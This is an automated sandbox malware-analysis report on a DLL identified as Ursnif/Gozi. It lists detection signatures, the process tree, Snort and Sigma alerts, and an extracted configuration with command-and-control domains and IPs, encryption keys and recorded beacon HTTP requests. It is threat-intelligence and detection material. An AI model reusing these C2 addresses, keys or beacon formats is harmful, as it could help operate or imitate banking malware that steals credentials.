Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hFGZpat9Mf.dll

Overview

General Information

Sample Name:hFGZpat9Mf.dll
Analysis ID:560543
MD5:9acde2c3e3a375590a1bc716eabc52c5
SHA1:e231c9ae802a9aad9916f08256f7558f531d54ce
SHA256:57f997217db22a4d97700768189d44034303e3b15dc08fa48ed6b91bd7051c05
Tags:dllGoziISFBUrsnif
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Writes or reads registry keys via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Found evasive API chain (may stop execution after checking system information)
Sigma detected: Suspicious Call by Ordinal
Writes registry values via WMI
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Contains functionality to record screenshots
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 988 cmdline: loaddll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 5904 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 3272 cmdline: rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • WerFault.exe (PID: 4496 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 684 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "a/OOe3vutyE+gNUF58s+932DNMr8fczoarMUDWqkJsUgObu+3KDuWCwO4VJi2nQNFoXQ13xL3U4zAT7teC979D2YSjTERxwWBeeP0HeZqNq0qcAgYIwsDRVFhGgIWRlndn894LdhC+W8uyATPg1or5n2yZWlh+/NEBJX1nFopQ/z09NIGZPpSgelgd7Gl3dRww5rEsR2WK4eL7TmnaoLNu6StWcVsJ2/hdx1IvAw+0FHXO2OQVeCIyD0YqFOgVX4yIlMXSNJExST4L1Wc5wBukAkkdIxFsm7gsamW82tEhFe2W5TqQV7VVRxRARRhHVoEwzsqj+Q49089Kkixnoy1HXPNrN04rhNhyDNba5DkKY=", "c2_domain": ["config.edge.skype.com", "194.76.226.200", "giporedtrip.at", "habpfans.at", "31.214.157.187"], "botnet": "3000", "server": "50", "serpent_key": "YFyLBjaJo8V90gKm", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
    00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
      00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
        00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 19 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.rundll32.exe.ee0000.2.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              3.0.rundll32.exe.ee0000.6.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                3.2.rundll32.exe.1080000.3.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  3.0.rundll32.exe.1080000.3.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    0.2.loaddll32.exe.9e0000.3.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 14 entries

                      Sigma Overview

                      System Summary

                      barindex
                      Sigma detected: Suspicious Call by Ordinal
                      Source: Process startedAuthor: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5904, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1, ProcessId: 3272

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "a/OOe3vutyE+gNUF58s+932DNMr8fczoarMUDWqkJsUgObu+3KDuWCwO4VJi2nQNFoXQ13xL3U4zAT7teC979D2YSjTERxwWBeeP0HeZqNq0qcAgYIwsDRVFhGgIWRlndn894LdhC+W8uyATPg1or5n2yZWlh+/NEBJX1nFopQ/z09NIGZPpSgelgd7Gl3dRww5rEsR2WK4eL7TmnaoLNu6StWcVsJ2/hdx1IvAw+0FHXO2OQVeCIyD0YqFOgVX4yIlMXSNJExST4L1Wc5wBukAkkdIxFsm7gsamW82tEhFe2W5TqQV7VVRxRARRhHVoEwzsqj+Q49089Kkixnoy1HXPNrN04rhNhyDNba5DkKY=", "c2_domain": ["config.edge.skype.com", "194.76.226.200", "giporedtrip.at", "habpfans.at", "31.214.157.187"], "botnet": "3000", "server": "50", "serpent_key": "YFyLBjaJo8V90gKm", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
                      Multi AV Scanner detection for submitted file
                      Source: hFGZpat9Mf.dllVirustotal: Detection: 20%Perma Link
                      Source: hFGZpat9Mf.dllReversingLabs: Detection: 32%
                      Antivirus detection for URL or domain
                      Source: http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/VN2ToaIYsZPU/kI1do_2B9jW/Q9gfyv85CoHPvT/SnqcLw3TTcQW61PNrLWiv/_2BkKhdRaMJkT9HD/82Fg3tERnOrn6Yg/fT2SNRr4ih8M1B9lEq/WIX8riitn/8yNrCBKJNgpm3khA4gSx/B8X3zDAJaQCYV1F4k99/jQHMcxYL/Il8wT6lWu/Ih.jlkAvira URL Cloud: Label: malware
                      Source: http://giporedtrip.at/drew/vDXEGqf4EaI6e/GBZCusNA/wGFZ17UZEew5_2F3lztpfux/SlqAMrP7W1/XBD36Fnf1Eq7wA6HD/bZQhlGWv2oMx/02wZPYg1S9_/2FsBPVVzIGiliu/ZgesoO3_2BU1Itp9mWBBQ/zS9Fa06G7Ifi1Qdi/yVB_2BRlu8Zp_2B/LJtKQv4YtcqH6IAzxR/L6Ho0ZvfB/evXUKtmzU_2B4Fe1cs5B/1wJA25jdSjnKCVAyqP7/xAdhGKLVvM/CvkvXIJYGs/9.jlkAvira URL Cloud: Label: malware
                      Source: http://habpfans.at/Avira URL Cloud: Label: malware
                      Source: http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wAvira URL Cloud: Label: malware
                      Source: http://giporedtrip.at/drew/CNAO_2FMqt2bQnnFTS9A/gZCx4lwGHYQjpKz_2Bo/eC3Q_2B6RQnBEorg_2FJk6/uEN67LHG_2FS5/_2BBd1X9/aVPauq0optO45rzbpdCQm0T/aYIRRNsEBo/KjgLaOYvR_2BgwzfQ/25S5OlQYXnss/XWKrlvnyLdL/zvJbW2nKGtMp_2/BhAqVJaOXmJzkoWYA4_2B/1sUQfL4pghiYPQ_2/Bk4zNXCpOm9uy6W/_2FwvvWoJCQywtXfuj/zSz8jbk7z4_2FaKsy/ujc.jlkAvira URL Cloud: Label: malware
                      Source: http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wLkUkA7sRnm/cso3yuTSujNtgI/CMmvYVa7e4KaoltzEmBTc/sgUl10rzE9jSORq1/rqqMvEmtzS52b3S/MwqSqUIn0qJ41lN07l/ltNVceIDT/qjCtCMmp_2FbkkqAoDDI/2nZPBTOmmpjaMrj1ust/QMCPjE0wKPGXBQrFS0WE_2/B3SVbiens/K.jlkAvira URL Cloud: Label: malware
                      Source: http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/Avira URL Cloud: Label: malware
                      Source: http://habpfans.at/gAvira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URL
                      Source: giporedtrip.atVirustotal: Detection: 11%Perma Link
                      Source: habpfans.atVirustotal: Detection: 11%Perma Link
                      Machine Learning detection for sample
                      Source: hFGZpat9Mf.dllJoe Sandbox ML: detected
                      Source: 3.0.rundll32.exe.1080000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                      Source: 0.2.loaddll32.exe.890184.1.unpackAvira: Label: TR/Kazy.4159236
                      Source: 3.0.rundll32.exe.ed0184.5.unpackAvira: Label: TR/Kazy.4159236
                      Source: 3.0.rundll32.exe.ed0184.1.unpackAvira: Label: TR/Kazy.4159236
                      Source: 3.2.rundll32.exe.1080000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                      Source: 0.2.loaddll32.exe.9e0000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                      Source: 3.0.rundll32.exe.1080000.7.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                      Source: 3.2.rundll32.exe.ed0184.1.unpackAvira: Label: TR/Kazy.4159236
                      Source: hFGZpat9Mf.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.261009852.0000000004A6B000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: advapi32.pdbl source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: version.pdb` source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: shell32.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: oleaut32.pdbv source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: version.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wsspicli.pdbj source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: powrprof.pdbr source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: comctl32v582.pdbg source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_007053C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E153C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,

                      Networking

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49753 -> 13.107.42.16:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49758 -> 194.76.226.200:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49771 -> 211.119.84.112:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49771 -> 211.119.84.112:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49781 -> 41.41.255.235:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49812 -> 31.214.157.187:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49812 -> 31.214.157.187:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49814 -> 13.107.43.16:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49825 -> 181.129.180.251:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49827 -> 61.36.14.230:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49828 -> 31.214.157.187:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49829 -> 13.107.43.16:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49829 -> 13.107.43.16:80
                      Source: Joe Sandbox ViewASN Name: EPMTelecomunicacionesSAESPCO EPMTelecomunicacionesSAESPCO
                      Source: Joe Sandbox ViewASN Name: TE-ASTE-ASEG TE-ASTE-ASEG
                      Source: Joe Sandbox ViewIP Address: 181.129.180.251 181.129.180.251
                      Source: global trafficHTTP traffic detected: GET /drew/ozC7eSUmzahvYkYKrp/EnTXsLZQu/ZxwfzvyOea6Ms_2FcWiK/QVPuXmRecwMBmPtS2pP/K1YuqB0TTP3PJ7dc3csdFA/1Ac_2BGJ3ahfL/ClNkrX58/ZDofYbeDbIVvrUisO8PwbQv/pc3vAH6GWF/x_2B4_2BbH_2B0wxz/YCHkmZmDbaCX/aMf9JRtYupc/_2Ben2gyoQcqJb/gP1jDokjfsnRCuX4LwXIc/R6CnFb_2FUwS1dKT/G7Z9QUvFXshW5HS/y.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
                      Source: global trafficHTTP traffic detected: GET /drew/CNAO_2FMqt2bQnnFTS9A/gZCx4lwGHYQjpKz_2Bo/eC3Q_2B6RQnBEorg_2FJk6/uEN67LHG_2FS5/_2BBd1X9/aVPauq0optO45rzbpdCQm0T/aYIRRNsEBo/KjgLaOYvR_2BgwzfQ/25S5OlQYXnss/XWKrlvnyLdL/zvJbW2nKGtMp_2/BhAqVJaOXmJzkoWYA4_2B/1sUQfL4pghiYPQ_2/Bk4zNXCpOm9uy6W/_2FwvvWoJCQywtXfuj/zSz8jbk7z4_2FaKsy/ujc.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: giporedtrip.at
                      Source: global trafficHTTP traffic detected: GET /drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wLkUkA7sRnm/cso3yuTSujNtgI/CMmvYVa7e4KaoltzEmBTc/sgUl10rzE9jSORq1/rqqMvEmtzS52b3S/MwqSqUIn0qJ41lN07l/ltNVceIDT/qjCtCMmp_2FbkkqAoDDI/2nZPBTOmmpjaMrj1ust/QMCPjE0wKPGXBQrFS0WE_2/B3SVbiens/K.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: habpfans.at
                      Source: global trafficHTTP traffic detected: GET /drew/n9Q8SXORQfxecr/MW5_2Fu9_2Bgocr6670ju/D1JJTVEHrWL1TxqL/xGoJ_2FQlD36_2B/GkPBzrjzE3l7JBLY9O/1EFPlHsMW/m5HxfuFe9CAmeE3Sv9mV/WruJ_2B6bq6RWMaARg5/48WJvcYD9cWVaImnFjKYnp/qqfI438hlaFuV/Cz10Llo3/y28DCtREPMb5OZnUZKj2hAx/fvbD6E0k2X/xMHWSCI5symguz2Bp/FnCO_2F0QOq8/vwhEVJIxW/5.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 31.214.157.187
                      Source: global trafficHTTP traffic detected: GET /drew/t4UXVVFvbg_2F3LXo8gXBT/1icGJdsG14mTA/YOVrBwZF/xARqsNBXczJePkKt2X6ww_2/BWmoPwSUrF/dMkwNYvCaezjn8JBl/H0ytvGxBbW3l/zR2N_2BHrz_/2FvsAN_2FRzTTC/lSSKBusA2w75D7HkZKGJs/DACOMqt0XK0wSfc5/bo0iFsZeiFg2i2l/JDzyY2V7hheHpK0ocJ/ZgcshLwb0/jlOmaQmjqFbHJJo3m7Pt/o4K7mLse1jm/1K47Z.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
                      Source: global trafficHTTP traffic detected: GET /drew/vDXEGqf4EaI6e/GBZCusNA/wGFZ17UZEew5_2F3lztpfux/SlqAMrP7W1/XBD36Fnf1Eq7wA6HD/bZQhlGWv2oMx/02wZPYg1S9_/2FsBPVVzIGiliu/ZgesoO3_2BU1Itp9mWBBQ/zS9Fa06G7Ifi1Qdi/yVB_2BRlu8Zp_2B/LJtKQv4YtcqH6IAzxR/L6Ho0ZvfB/evXUKtmzU_2B4Fe1cs5B/1wJA25jdSjnKCVAyqP7/xAdhGKLVvM/CvkvXIJYGs/9.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: giporedtrip.at
                      Source: global trafficHTTP traffic detected: GET /drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/VN2ToaIYsZPU/kI1do_2B9jW/Q9gfyv85CoHPvT/SnqcLw3TTcQW61PNrLWiv/_2BkKhdRaMJkT9HD/82Fg3tERnOrn6Yg/fT2SNRr4ih8M1B9lEq/WIX8riitn/8yNrCBKJNgpm3khA4gSx/B8X3zDAJaQCYV1F4k99/jQHMcxYL/Il8wT6lWu/Ih.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: habpfans.at
                      Source: global trafficHTTP traffic detected: GET /drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8cGXljg/dR5mjLhLFYJj3437/sCPrzkqYN8vu4UK/Lv8bHqBMBEjz1n4JUX/xuOm6McxD/U7cQGMW7Bxk_2BVYpR1Y/2dwD1RGZgWHtptGZcjA/6KkSFpd8oqg4xHg9j8CKKi/XQJvRiHHSuj0_/2BwWvoV7/60l_2BahFJ3qIHK1CvN87c7/jOCSFwu.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 31.214.157.187
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:03:50 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 